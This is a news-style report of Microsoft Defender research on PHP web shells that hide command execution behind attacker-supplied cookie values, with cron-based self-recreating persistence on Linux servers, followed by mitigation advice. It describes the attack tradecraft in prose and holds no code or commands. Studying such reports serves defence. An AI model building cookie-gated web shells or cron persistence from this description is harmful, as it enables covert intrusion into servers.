According to findings from the **Microsoft Defender Security Research Team**, threat actors are exploiting HTTP cookies to control **PHP**-based web shells on **Linux** servers. This allows them to achieve remote code execution in a stealthier manner. "Instead of exposing command execution through URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, pass instructions, and activate malicious functionality," **Microsoft** stated. ### The Stealth Advantage This approach offers increased stealth because the malicious code remains dormant during normal application execution. The web shell logic is only activated when specific cookie values are present. This behavior extends to web requests, scheduled tasks, and trusted background workers. The malicious activity takes advantage of the fact that cookie values are readily available at runtime through the `$_COOKIE` superglobal variable in **PHP**. This allows attacker-supplied inputs to be consumed without additional parsing. Furthermore, the technique is unlikely to raise red flags as cookies blend into normal web traffic, reducing visibility. ### Implementation Variations The cookie-controlled execution model comes in different implementations: * A **PHP** loader that uses multiple layers of obfuscation and runtime checks before parsing structured cookie input to execute an encoded secondary payload. * A **PHP** script that segments structured cookie data to reconstruct operational components such as file handling and decoding functions, and conditionally writes a secondary payload to disk and executes it. * A **PHP** script that uses a single cookie value as a marker to trigger threat actor-controlled actions, including execution of supplied input and file upload. ### Initial Access and Persistence In at least one instance, threat actors gained initial access to a victim's hosted **Linux** environment through valid credentials or the exploitation of a known security vulnerability. This access was used to set up a cron job that periodically invokes a shell routine to execute an obfuscated **PHP** loader.  This "self-healing" architecture allows the **PHP** loader to be repeatedly recreated by the scheduled task, even if it is removed during cleanup efforts. This creates a reliable and persistent remote code execution channel. Once deployed, the **PHP** loader remains inactive during normal traffic and only activates upon receiving HTTP requests with specific cookie values. "By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions," **Microsoft** added. "By separating persistence through cron-based re-creation from execution control through cookie-gated activation, the threat actor reduced operational noise and limited observable indicators in routine application logs." A common aspect across all implementations is the use of obfuscation to conceal sensitive functionality and cookie-based gating to initiate the malicious action, minimizing the interactive footprint. ### Mitigation Strategies To counter this threat, **Microsoft** recommends: * Enforcing multi-factor authentication for hosting control panels, SSH access, and administrative interfaces. * Monitoring for unusual login activity. * Restricting the execution of shell interpreters. * Auditing cron jobs and scheduled tasks across web servers. * Checking for suspicious file creation in web directories. * Limiting hosting control panels' shell capabilities. "The consistent use of cookies as a control mechanism suggests reuse of established web shell tradecraft," **Microsoft** said. "By shifting control logic into cookies, threat actors enable persistent post-compromise access that can evade many traditional inspection and logging controls." "Rather than relying on complex exploit chains, the threat actor leveraged legitimate execution paths already present in the environment, including web server processes, control panel components, and cron infrastructure, to stage and preserve malicious code."